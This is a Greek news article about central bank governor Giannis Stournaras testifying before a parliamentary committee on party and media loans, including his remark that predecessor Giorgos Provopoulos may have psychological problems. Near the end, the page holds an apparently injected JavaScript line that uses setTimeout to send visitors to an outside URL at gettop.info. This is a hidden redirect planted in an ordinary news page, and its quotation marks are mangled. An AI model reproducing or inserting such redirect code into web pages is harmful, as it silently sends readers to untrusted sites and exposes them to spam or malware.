Ο Γ. Στουρνάρας στην Eξεταστική – «Ο κ. Προβόπουλος μπορεί να έχει διάφορα ψυχολογικά προβλήματα» (ΒΙΝΤΕΟ)

0
17
O διοικητής της Τράπεζας της Ελλάδος Γιάννης Στουρνάρας μιλάει στη συνεδρίαση της εξεταστικής επιτροπής για τη διερεύνηση της νομιμότητας της δανειοδότησης των πολιτικών κομμάτων, καθώς και των ιδιοκτητριών εταιρειών μέσων μαζικής ενημέρωσης, στη Βουλή, Τρίτη 11 Οκτωβρίου2016. ΑΠΕ-ΜΠΕ /ΑΠΕ-ΜΠΕ/ ΑΛΕΞΑΝΔΡΟΣ ΜΠΕΛΤΕΣ

 

Eνώπιον της εξεταστικής επιτροπής της Βουλής που διερευνά την δανειοδότηση ΜΜΕ και κομμάτων καταθέτει αυτή την ώρα ο επικεφαλής της Τράπεζας της Ελλάδος Γιάννης Στουρνάρας, ο οποίος στην εισαγωγική τοποθέτηση του άφησε έμμεσες αιχμές κατά των κυβερνήσεων του Κώστα Καραμανλή.

«Το κύριο αίτιο της κρίσης δεν είναι η κρίση του χρηματοπιστωτικού συστήματος αλλά η δημοσιονομική κρίση ετών 2008-2010 που οδήγησε τη χώρα σε κρίση χρέους», τόνισε ο κ. Στουρνάρας ενώ στη συνέχεια ανέφερε ότι η Ελλάδα βρέθηκε στα όρια της καταστροφής και διασώθηκε έπειτα από τις παρεμβάσεις των κυβερνήσεων από το 2010 και μετά.

Ο πρώην υπουργός δήλωσε επίσης ότι το PSI ήταν μεταξύ εκείνων των αιτιών που προκάλεσε προβλήματα στα χαρτοφυλάκια των τραπεζικών ιδρυμάτων, που έχουν όμως καλυφθεί πλήρως.

Σχετικά με την Attica Bank, υποστήριξε ότι η τράπεζα είχε πάρει πολύ λάθος δρόμο, η ΤτΕ με τον εποπτικό της ρόλο κατάφερε να την εξυγιάνει και να αλλάξει την διοίκηση, κάτι που, όπως είπε, θα μπορούσε να το είχε κάνει νωρίτερα και ο προκάτοχός του.

Στη συνέχεια, εξαπέλυσε επίθεση στον προκάτοχό του, Γιώργο Προβόπουλο, λέγοντας ότι «μπορεί να έχει ψυχολογικά προβλήματα». Κάνοντας ειδική μνεία στην κατάθεση του κ. Προβόπουλου, στην οποία είχε ισχυριστεί πως ο κ. Στουρνάρας, ως υπουργός Οικονομικών, καθυστέρησε να παρέμβει στην Attica Bank, ανέφερε τα εξής:

«Ο κ. Προβόπουλος μπορεί να έχει διάφορα ψυχολογικά προβλήματα. Ας κρίνει την περίοδο που ήταν αυτός διοικητής. Εγώ έκρινα ότι έπρεπε να εξυγιανθεί η Τράπεζα Αττικής και σήμερα έχει την καλύτερη διοίκηση και είναι σε εξυγίανση. Θα μπορούσε να το κάνει και ο Προβόπουλος όταν ήταν στην ΤτΕ. Δεν ήταν αρμοδιότητα του υπουργού Οικονομικών».

«Δεν με ενημέρωσε ποτέ. Έχει κάνει λάθος, ανέτρεξα στο αρχείο μου δεν υπάρχει επιστολή που αναφέρεται στο διττό πρόβλημα ότι ένα πρόσωπο έχει ιδιότητα προέδρου και διευθύνοντος συμβούλου».

Η τροπολογία για το ακαταδίωκτο των τραπεζιτών δεν αφορούσε τα κόμματα

Μιλώντας προς την αρμόδια εξεταστική επιτροπή της Βουλής, ο διοικητής της ΤτΕ ανέφερε πως η τροπολογία των τριών βουλευτών της ΝΔ που απάλλασσε τους τραπεζίτες από ποινικές ευθύνες για θαλασσοδάνεια και οδήγησε στο να μπει το πόρισμα Καλούδη στο αρχείο, αφορούσε νομικά πρόσωπα που δεν ανήκουν στη Γενική Κυβέρνηση και όχι κόμματα.

Την τροπολογία αυτή, κατά τα λεγόμενα του κεντρικού τραπεζίτη, δεν την υπέγραψε ο ίδιος ως υπουργός Οικονομικών. Ωστόσο, όπως επεσήμανε ο πρόεδρος της επιτροπής Σωκράτης Φάμελλος, η δήλωση Στουρνάρα δημιουργεί νέα δεδομένα, καθώς με την επίκληση αυτής της τροπολογίας μπήκε στο αρχείο το πόρισμα Καλούδη, για την παράνομη δανειοδότηση των κομμάτων.

Κατά τη διάρκεια της εξέτασής του από την επιτροπή ο κ. Στουρνάρας ανέφερε πως δεν έχει πολιτικές φιλοδοξίες

Στο μεταξύ, έγινε γνωστό ότι δεν θα καταθέσει ούτε αύριο Τετάρτη στην Επιτροπή ο εκδότης του Πρώτου Θέματος Θέμος Αναστασιάδης.

Ο πρόεδρος της Εξεταστικής Σωκράτης Φάμελλος ανακοίνωσε ότι ο εκδότης επικοινώνησε μαζί του προσωπικά και του γνωστοποίησε τον προσωπικό λόγο για τον οποίο δεν μπορεί να προσέλθει. «Συναινώ ότι υφίσταται ο λόγος» πρόσθεσε.

Ο κ. Φάμελλος είπε ότι προσωπικός λόγος «περιέχει θέμα υγείας» και ανακοίνωσε ότι η κατάθεση του Θ. Αναστασιάδη θα γίνει την επόμενη εβδομάδα.

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here